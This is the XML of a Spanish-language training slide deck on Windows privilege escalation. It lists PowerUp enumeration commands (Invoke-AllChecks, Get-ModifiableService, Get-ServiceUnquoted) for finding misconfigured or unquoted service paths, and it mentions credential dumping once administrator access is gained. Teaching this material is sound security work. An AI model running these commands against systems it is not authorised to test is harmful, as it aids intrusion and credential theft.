    <w:p w14:paraId="264B19D2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="199"/>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90752" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F1AC814" wp14:editId="217A8860">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4262628</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>301994</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4063365" cy="1120140"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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3365" cy="1120140"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="64A22DF2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="44"/>
                              <w:ind w:right="120"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:w w:val="80"/>
                              </w:rPr>
                              <w:t xml:space="preserve">. </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-2"/>
                                <w:w w:val="95"/>
                              </w:rPr>
                              <w:t>.\PowerUP.ps1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3CC99579" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="413"/>
                              <w:ind w:left="1" w:right="120"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>Invoke-AllChecks –Verbose</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="5F1AC814" id="Textbox 501" o:spid="_x0000_s1260" type="#_x0000_t202" style="position:absolute;margin-left:335.65pt;margin-top:23.8pt;width:319.95pt;height:88.2pt;z-index:-1562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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="64A22DF2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="44"/>
                        <w:ind w:right="120"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:w w:val="80"/>
                        </w:rPr>
                        <w:t xml:space="preserve">. </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-2"/>
                          <w:w w:val="95"/>
                        </w:rPr>
                        <w:t>.\PowerUP.ps1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3CC99579" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="413"/>
                        <w:ind w:left="1" w:right="120"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>Invoke-AllChecks –Verbose</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2A591E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="186"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A9A6D8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1129"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1129" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Listar los servicios que se pueden configurar :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4872893B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D077153" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="519375A3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="63"/>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91264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74CE8DEF" wp14:editId="3327F978">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3887723</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>215419</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4811395" cy="601980"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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1395" cy="601980"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4873DE95" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="177"/>
                              <w:ind w:left="292"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>Get-ModifiableService -Verbose</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="74CE8DEF" id="Textbox 502" o:spid="_x0000_s1261" type="#_x0000_t202" style="position:absolute;margin-left:306.1pt;margin-top:16.95pt;width:378.85pt;height:47.4pt;z-index:-15625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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4873DE95" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="177"/>
                        <w:ind w:left="292"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>Get-ModifiableService -Verbose</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2114CB0E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35BE8D96" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="86"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A4A817E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1129"/>
        </w:tabs>
        <w:ind w:left="1129" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ruta de servicio sin comillas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47569BFC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60AAEAE3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="4"/>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91776" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F9A3CF3" wp14:editId="7B20ED45">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4262628</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>177889</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4436745" cy="462280"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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745" cy="462280"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="3DCED68E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="94"/>
                              <w:ind w:left="166"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>Get-ServiceUnquoted -Verbose</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1F9A3CF3" id="Textbox 503" o:spid="_x0000_s1262" type="#_x0000_t202" style="position:absolute;margin-left:335.65pt;margin-top:14pt;width:349.35pt;height:36.4pt;z-index:-1562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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="3DCED68E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="94"/>
                        <w:ind w:left="166"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>Get-ServiceUnquoted -Verbose</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1801E63A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="460" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE9F7CB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D3ED7A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="855"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="524A4D24" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>DEMO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077E469B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1220" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12676AB3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:spacing w:line="655" w:lineRule="exact"/>
        <w:ind w:left="1032" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reconocimiento de administrador</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247505F5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="387252EF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14E466E1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="194B873A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487692288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="393B7CB5" wp14:editId="3A2C0359">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>70093</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>246469</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12038330" cy="4107815"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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8330" cy="4107815"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12038330" cy="4107815"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="505" name="Image 505"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId260" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12038096" cy="4107280"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="506" name="Image 506"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId261" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="164602" y="164667"/>
                            <a:ext cx="11722608" cy="3791712"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="7505F863" id="Group 504" o:spid="_x0000_s1026" style="position:absolute;margin-left:5.5pt;margin-top:19.4pt;width:947.9pt;height:323.45pt;z-index:-15624192;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="120383,410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">
                <v:shape id="Image 505" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:120380;height:4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">
                  <v:imagedata r:id="rId262" o:title=""/>
                </v:shape>
                <v:shape id="Image 506" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1646;top:1646;width:117226;height:3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">
                  <v:imagedata r:id="rId263" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="018F8C79" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="700" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B0CAD9C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1607"/>
        </w:tabs>
        <w:spacing w:before="50" w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1607" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Con suficientes privilegios en la máquina local, el Adversario intentará realizar donde</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306D2798" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1608"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Los usuarios administradores han iniciado sesión. Ejemplo de técnica: volcado de credenciales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6694C337" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7411FC61" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="97"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="710C088D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1607"/>
        </w:tabs>
        <w:ind w:left="1607" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Por lo general, las cuentas de servicio tienen privilegios de administrador en una máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B0F80A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21288A5A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="153"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
